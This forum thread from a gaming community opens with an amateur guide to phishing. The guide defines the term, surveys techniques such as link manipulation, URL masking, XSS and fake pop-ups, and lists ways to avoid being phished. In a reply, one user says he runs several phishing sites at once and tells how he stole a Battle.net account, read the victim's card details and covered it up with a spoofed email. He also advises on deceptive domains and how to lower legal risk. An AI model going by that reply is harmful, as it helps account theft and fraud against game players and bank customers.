Phishing: What it is and how to avoid it.

[Lazeka]

Phishing: What it is and how to avoid it.

Tables of Content

I. Introduction
II. The definition of "Phishing" and what it is
III. Why people use it
IV. The types of phishing techniques and how people use them
V. How to avoid Phishing sites
Conclusion

I. Introduction

Let's get started then, shall we? This is my guide on phishing. In it I shall explain what phishing is, how it's used, why it's used, and how to avoid it. All sound like relatively simple things, and they are if you know what you're doing.

However, many people do not know. And the fact people don't know, to me, is absolutely astounding. It's rather scary how easy it is to steal somebodies personal information, you wouldn't believe how easy it is until you've tried it or seen someone do it.

This is a rather long guide, I've tried to be as descriptive as possible but if I've made a mistake, placed incorrect information or need to add something feel free to send me a PM or reply so that I can fix it.

Remember: This is for YOUR benefit, YOU benefit from knowing how to avoid phishers!

First off, here's the definition of the word "phishing." As well as how the Wikipedia article on the subject puts it.

Read on to find out the definition of phishing and what it is.

II. The definition of "Phishing" and what it is

As told by both Dictionary.com and Wikipedia.org, here are the definitions of Phishing.

To request confidential information over the Internet under false pretenses in order to fraudulently obtain credit card numbers, passwords, or other personal data.

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.

Do note these definitions, because they are extremely broad. And you will learn why in the next few sections.

III. Why people use it

This one is fairly obvious but I will state it anyway. People phish for information, for knowledge, for money. Some even do it for fun.

Some of the most common phishers are used to gain bank account details, credit card details, e-mail address, PayPal accounts, etc. All of these can be used to get money.

To use an example closer to home for you guys, people phish for World of Warcraft accounts (among other MMO's) so that they can either sell the gold found on those accounts, or use those accounts to scam other people in-game with. Or of course, to bot.

Most of those methods end up getting someone money. Whether you sell the account or just the gold and items on it, you can be sure someone is doing it for money. At least one person, that is.

IV. The types of phishing techniques and how people use them

Remember when I said the definitions of phishing were broad? Well, they are. Phishing isn't just limited to making websites to scam people of their details but to practically anything that allows you to gain personal information unlawfully via means of electronic communication. The internet doesn't have to be involved, but it usually is.

1. Social Engineering

This is common. Really common, it's also incredibly effective if you can pull it off. The act of using social engineering in phishing is basically to enforce urgency upon a certain topic.

Certain words or sentences that would raise anxiety in the victim are used, things like "to restore access to your account". In fact, many of you may have seen that very sentence in phishing e-mails for World of Warcraft.

2. Phone Phishing

Phone phishing doesn't need a website to work. It generally works in conjunction with e-mail forgeries where the phisher tells the victim to call a particular phone number (the number is owned by the phisher, sometimes provided by a VoIP service as it's cheaper and easier, also less risky).

One dialed, the victim is told to insert so and so information. Usernames, passwords, bank account details, credit card information, blah blah blah, etc etc. You get the picture.

Some phone phishers also fake caller ID data to give the appearance that they are a real and trusted company. This is also far easier to do than masking your URL address.

3. Link Manipulation

Link manipulation is exactly what it sounds. An e-mail may contain a link telling you to go to "worldofwarcraft.com" but, in reality, it actually links you to the phisher's website. This is one of the most common, if not the most common, phishing tactic out there.

It's also extremely easy to avoid in most cases. For most MMO phishing sites it is fairly straight forward to avoid, for bank sites the phisher will probably take greater precautions so that you stay fooled.

4. Website Forgeries

This ties in with link manipulation, because the fun ain't over once you reach the site! It's possible to mask a URL (a technique known as URL masking) so that it shows one address instead of the actual sites address.

So far, I have never been able to find out how to do. Websites that work in frames can do so (+1 to those who understand that) apparently, but from personal experience it's not as effective as one may like.

JavaScript can be used to mask URL's, but I am unaware of the process. There is also a flaw in websites known as "XSS". Or cross-site scripting. This is a flaw in a websites own design.

Cross-site scripting is a vulnerability which allows code injections into websites. Trusted corporate websites, for example. The kind of sites phishers would target. Most of these injections are client-side (so written in something like JavaScript) and they can be used to change certain details of a website for that viewer.

Simply put, you go to a site that has an XSS vulnerability. Somethings been modified on your end so that certain details such as the URL bar, links, etc have been changed. The site looks perfectly safe and real, but of course, it's not. It's still their site, but things like security certificates still validate for the actual trusted site.

It's problematic simply because it's so hard to track. The average user isn't going to know. In fact, I wouldn't know. There are methods to get around this though if you are suspicious or very paranoid.

To put it in perspective how dangerous XSS can be: PayPal faced this vulnerability back in 2006.

5. The Pop-Up Window

This ones pretty good, it can be concealed rather well. I've been fooled by it once, myself. You're directed to the trusted website, but the sites been attacked so that, upon visiting, a pop-up window comes up asking for your credentials.

You pop them in and continue on your merry way. Little do you know, the details were saved in a txt file on the phishers host and you just got your details stolen. Bugger.

This works on some forums. Especially ones that allow HTML to be posted. For example, you know Curse? Big network for MMO's such as World of Warcraft, Warhammer Online, Aion, etc?

The script works there.

6. The Website

I posted this last because it's common, it's also not hard to explain, and it's not really a "technique" but more of what you'll probably see at a phishing site. Using the above methods the victim is lead to The Website.

E-mails are sent out to convince people their accounts have been compromised, link manipulation is used to make the link in the email look real, then the URL's been masked to fool you.

You go to the site, it checks out. Or does it? To the naked eye, it will. The layout looks the same. Under the hood the codes probably different for one, oh and it also saves your details in a txt file (or it sends them to the phishers email address).

There are methods to avoid sites like these. Look below for how to do so.

V. How to avoid Phishing sites

Methods on how to avoid them. What you need to read and what you must understand if you want any hope of avoiding phishers. Most of the ways are common sense. Here's a list.

1. Use common sense, don't be stupid.

This is the single most important rule of not being phished, and is also why I don't give a damn if you get phished. Because most people are stupid. I'm being serious, most victims are stupid.

Most scams that people here will see will probably be MMO scams. Phishers for WoW and other MMO's. The creators of those don't take many precautions. They use free hosts which you can report, they won't buy security certificates and they won't go out of their way to mask URLs.

"If it looks too good to be true, it probably is."

2. Check the URL address

This ties in with common sense but ALWAYS check the URL. Hell, it even says this on the page to do so. World of Warcraft phishers, as well as the site itself, tell you to always beware of faked sites. Look at the URL.

A World of Warcraft site is not going to say FreeHostia.com is it? It's going to say worldofwarcraft.com. Look for that. This is one of the main reasons MMO players get their accounts hacked. THEY DON'T LOOK!

3. Check security certificates

Some phishers use their own domains, or even their own hosting. Check the security certificates for these, if there are none then don't trust it. If it does have one check if it's valid and for what by who.

PayPal have a security certificate. As does AlertPay. Both are signed by VeriSign. VeriSign are a well known and trusted seller of Secure Sockets Layer (SSL) Certificates. Sites signed by VeriSign can usually be trusted and I highly doubt a phisher is going to get accepted by VeriSign.

4. Do a "Whois" lookup

For those who work in the website industry, you'll probably know what this is. For those who don't, listen up!

Whois is exactly as it sounds, and works in a similar fashion like the function on WoW. You can look up domain names and IP address just by entering into the Google-like search box found on Who.is (link: Who.is: Whois, Website, Domain Name, and IP Tools - Who.is).

Do this on sites you think may be fake. This is PayPal's, this is Battle.net's, this is Google's, etc etc.

It's unlikely a phisher has the same IP address as the trusted site, if they're on a free host they'll have the same IP as that free host. Generally it's not necessary to do a Whois lookup, because if you can see the address you'll know it's fake.

This can be useful for people who may have bought a domain similar to that of a real trademark - like WoW-Cataclysm.com or something (also, WoW-Cataclysm.com is a real site of a guild that has been closed down by the looks of things, lol).

5. Trusted sites shouldn't ask you for your password

In fact, they shouldn't even have to. Sites like PayPal, World of Warcraft, Hotmail or banking sites use (or should be using) encryption to protect their users passwords.

Most of these sites are also set up so that the website administrators can login or change your details to your account at will. They don't need your password because they can change it.

Most gaming sites such as World of Warcraft or Battle.net also tell you specifically not to tell ANYONE your password, and that they will NEVER ask for it. Game Master's have no need for it and if one does ask for it you should deny them the request and report them to Blizzard.

6. Don't fall for the betas

A lot of gaming phishers that go around are for alpha or beta versions of the game. All fake, of course. Take World of Warcraft for example. You opted into that via your account, there was a big button that said "Beta Opt In".

Blizzard also announced that they were allowing people to opt in to their beta for Wrath of the Lich King. If you get an e-mail from Blizzard saying that the Cataclysm alpha is out, for example, check the website first.

If the website or your account management shows nothing, then it's fake.

7. Periodic contact isn't a bad thing

If you need to talk to a representative of a company, do so. Don't hesitate to do so, do it ASAP. That's what they're there for.

If your bank e-mails you saying somethings happened to your account and they need your details ring them. If the email has a phone number that it says you should ring don't ring that but instead ring the number on their actual website (go to it yourself via your URL bar) or a business card.

For Blizzard and other game developers, the same thing applies. They have a Customer Service line (I hate that word, should be support, not a bloody service, we pay enough for it!). As do companies like PayPal or Microsoft.

If in doubt, give them a shout.

8. Cross-site scripting and website forgeries

These are hard. It's hard to get around sites that have been abused due to XSS vulnerabilities. It's also hard to get around sites which has URL masking. URL masking can be checked "easily" by looking for a security certificate, a bank would have one, a phisher wouldn't.

As for XSS, I can't recommend anything because even computer specialists can have trouble looking for them.

Conclusion

Well that's it from me. I'm sure I've missed something or said something wrong so please, as I said from the start, feel free to correct me if I'm wrong or if I've missed something by way of PM or reply.

I hope this guide helps.

[nosepicker3]

Phone phishing doesn't need a website to work. It generally works in conjunction with e-mail forgeries where the phisher tells the victim to call a particular phone number (the number is owned by the phisher, sometimes provided by a VoIP service as it's cheaper and easier, also less risky).

This is untrue. In my opinion, coming from somebody who has 4-5 phishers up at a time, calling someone from your own phone number (especially if it belongs to the phisher, and isn't a pre-paid # or VoIP) and asking for their billing information or address is extremely, extremely risky and illegal. If you're in trial (unlikely, but possible), and its on record that you physically asked for their personal information, a conviction is much more likely.
However, say you phish (or get phished) somebody's battle.net account, you have immediate access to their personal information. If they registered a credit card or bank account to the Battle.net, you can plainly see all of the information.
Example: This is true because I phished a BNet account, and when I clicked on "billing and shipping information", I plainly saw their name, address, and every detail of their credit card information on the screen. None of it was concealed by the "XXXX-XXXX-XXXX-1234" credit card number blocker that the WoW account website has. What I did with that account was literally e-mail the person I phished using a fake mailer, using the "[email protected] tag" that his account was stolen, and was recovered to its original status. I told him an email was coming in with a new temporary password for him to use, and that he should change it immediately. I then did a password recovery, had it sent to his e-mail, and never used the account again.
However, you can claim that you never saw or used his personal information, and just used the account for playing. This stands a much better chance than the phone method.

Once dialed, the victim is told to insert so and so information. Usernames, passwords, bank account details, credit card information, blah blah blah, etc etc. You get the picture.

Some phone phishers also fake caller ID data to give the appearance that they are a real and trusted company. This is also far easier to do than faking a URL address.

Again, untrue. I know of a site that will give you a URL such as "http://www.wowphishingsite.com.au" The ".com" at the end leads many to believe its the real deal. Its nearly 100% concealed, minus the ".au" at the end.
However, I cannot find a single website that will allow you to block/disguise your phone number without at least keeping it on record. If the website has it on record, IT CAN BE FOUND AND USED IN COURT if you're arrested for fraud, assuming you use their credit card information illegally.

Other than that, its a really well-written, in-depth guide. Compared to the "lets jump on the new anti-scam bandwagon" threads that give no real information that 95% of people already knew, its very useful. Well organized, +rep from me.

[codyfromhell]

Boo, nobody *referring to me as everybody* cares about dodging phishers.

[elroyo]

Nice post

[Lazeka]

@nosepicker3: It doesn't matter how risky or illegal it is, some people still do it and I've seen people try and fool me with them before. Some people find the reward greater than the risk.

Also note that by "fake URL" I mean actually masking it. I should probably specify.

@codyfromhell: That's why people get fooled for them all the time?